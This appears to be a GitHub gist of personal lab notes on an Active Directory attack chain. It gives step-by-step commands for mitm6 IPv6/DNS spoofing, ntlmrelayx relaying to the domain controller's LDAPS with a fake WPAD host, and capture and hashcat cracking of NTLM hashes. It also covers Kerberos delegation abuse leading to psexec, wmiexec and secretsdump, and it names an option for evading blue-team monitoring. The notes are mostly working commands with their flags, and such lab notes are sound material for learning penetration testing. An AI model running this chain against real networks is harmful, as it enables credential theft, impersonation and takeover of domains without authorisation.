Skip to content

Instantly share code, notes, and snippets.

@HussienMisbah

HussienMisbah/mitm6.md

Last active July 14, 2022 16:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save HussienMisbah/fee834a2b962efb43dc3f849a33cd656 to your computer and use it in GitHub Desktop.
Save HussienMisbah/fee834a2b962efb43dc3f849a33cd656 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
mitm6.md

step-1 :

  • set mimt6 to start listening to ipv6 requests in the network and it will spoof it
sudo python ~/tools/mitm6/mitm6/mitm6.py -d marvel.local
  • example if we restart any machine we will see spoofing is done and at machine side:

image

  • and this is the attack ipv6 address

step-2 :

  • set ntlmrelayx so after spoofing you will relay to the target :
sudo ntlmrelayx.py -6 -t ldaps://192.168.17.138 -wh evil.marvel.local  -l loots
-6 : ipv6 
-t : target you want to relay on , i.e : DC
-wh: for WPAD host, specifying your fake wpad to serve
-l : save loots directory
  • in the example we are targeting the domain controller

step-3 :

  • wait until any machine reboots or any ipv6 action happens in the network

image

  • and at ntlmrelayx side :

image

  • and it dumped a lot of things here users,groups,etc

image

  • remember we have put SQL service in the description we can see it now

image

  • now if an administrator logs in to this machine we just spoofed , mimt6 will authenticate with LDAP to the DC and create for us a new user with special ACL

image

Capture hashes

you can also capture hashes when you spoofed the dns server , that can be done when any user try to access any share will get back to you allowing you to capture the user hash ==( same as responder but instead using LLMNR will use ipv6)==

# Set your spoofer 
sudo python3 mitm6.py -d marvel.local
# Set your smbserver
smbserver.py -smb2support SMB .

image

Then you can try to crack it with :

hashcat -m 5600 hash  /usr/share/wordlists/rockyou.txt

More :

  • using the option --no-ra for (not advertise ourselves) to avoid blue team monitoring
sudo python ~/tools/mitm6/mitm6/mitm6.py -d marvel.local --no-ra
  • Kerberos delegation attack
sudo ntlmrelayx.py -ts -6 -t ldaps://<dc-ip> -wh evil.marvel.local  --add-computer --delegate-access
# ldap server is usually the domain controller itself
-ts : Adds timestamp to every logging output
--add-computer: Attempt to add a new computer account
--delegate-access : Delegate access on relayed computer account to the specified account

Once a computer restarted and we spoofed the DHCPv6 successfully , we will add a new computer with a random name and allow impersonate users on it with the options we have specfied

getST.py -spn cifs/<spoofed-computer>.lab.local lab.local/<new-compuer>\$ -impersonate <domain-username>
# ex : getST.py -spn cifs/ws02.lab.local lab.local/ULRRDUA\$ -impersonate lkys
export KRB5CCNAME=lkys.ccache

we can now access file system or get an interactive shell using this ticket :

psexec.py -k ws02.lab.local -debug -no-pass
secretsdump.py -k ws02.lab.local -no-pass
wmiexec.py -k -no-pass -debug ws02.lab.local
smbclient -k //ws02.lab.local/c$

Resources :

https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

https://chryzsh.github.io/relaying-delegation/

https://youtu.be/Zb-Fp62N2y8

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment